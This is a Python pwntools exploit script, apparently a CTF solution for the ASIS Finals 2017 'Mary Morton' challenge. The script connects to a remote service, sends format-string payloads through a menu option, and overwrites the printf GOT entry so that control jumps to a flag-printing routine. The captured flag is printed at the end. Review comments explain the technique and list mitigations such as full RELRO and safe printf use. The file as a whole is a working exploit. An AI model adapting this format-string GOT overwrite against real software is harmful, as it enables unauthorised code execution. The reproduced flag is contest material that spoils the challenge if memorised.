Created
September 10, 2017 19:50
#!/usr/bin/python
#Faid Mohammed Amine
#Fb : piratuer
### [pwn] ASIS Finals 2017 - Mary Morton
from pwn import *
from formatStringExploiter.FormatString import FormatString

# Hard-coded absolute code address that the printf GOT slot is pointed at
# further down. Presumably the routine in the challenge binary that prints
# the flag (inferred from the name only -- confirm against the binary).
# NOTE(review): a fixed address like this is only meaningful if the target
# is not built position-independent; a PIE build with ASLR would not have a
# stable address here.
getflag = 0x4008DA

# Local copy of the challenge binary. It is handed to FormatString and used
# to look up the address of the printf GOT slot.
elf = ELF("./mary_morton")

# TCP connection to the CTF challenge service (host and port as published
# for the 2017 event).
r = remote("146.185.132.36",19153)
def exploit(pld):
    """Send one payload through menu option 2 and return what comes back.

    This is the callback handed to FormatString: it takes a candidate
    payload, submits it to the service over the module-level connection
    ``r``, and returns the bytes the service printed in response.

    Args:
        pld: The payload line to submit after selecting option 2.

    Returns:
        Everything received after the payload was sent, up to (and not
        including) the text "1. Stack Bufferoverflow Bug" of the next menu.
    """
    # Wait until the menu has been printed down to its last entry.
    r.recvuntil("3. Exit the battle")
    print("Sending: " + repr(pld))

    # First the menu choice, then the payload itself. Option 2 is presumably
    # the branch that echoes input through a format function -- confirm
    # against the binary.
    for line in ("2", pld):
        r.sendline(line)

    # The reply is delimited by the first entry of the menu that follows it;
    # drop=True strips that delimiter from the returned data.
    echoed = r.recvuntil("1. Stack Bufferoverflow Bug",drop=True)

    # Consume the remainder of that menu before returning.
    r.recvuntil("Exit the battle \n")
    return echoed
# Build the format-string helper around the exploit() callback. index=6 and
# pad=0 are presumably the argument position and alignment padding at which
# the submitted buffer appears to the format function -- values determined
# for this binary by the author; explore_stack=False skips the library's
# stack exploration pass.
payload = FormatString(
    exploit,
    elf=elf,
    index=6,
    pad=0,
    explore_stack=False,
)

# Write the 8-byte value `getflag` into the GOT slot for printf, so that the
# next printf call in the target transfers control to that address.
# NOTE(review): this depends on the GOT being writable at run time. Linking
# with full RELRO (-Wl,-z,relro,-z,now) maps the GOT read-only after startup
# and blocks this class of overwrite; the root-cause fix is never passing
# user-controlled data as the format argument (use printf("%s", buf)), which
# -Wformat -Wformat-security flags at compile time.
payload.write_q(elf.symbols['got.printf'], getflag)

# Hand the connection over to the terminal to read the service's output.
r.interactive()
#ASIS{An_impROv3d_v3r_0f_f41rY_iN_fairy_lAnds!}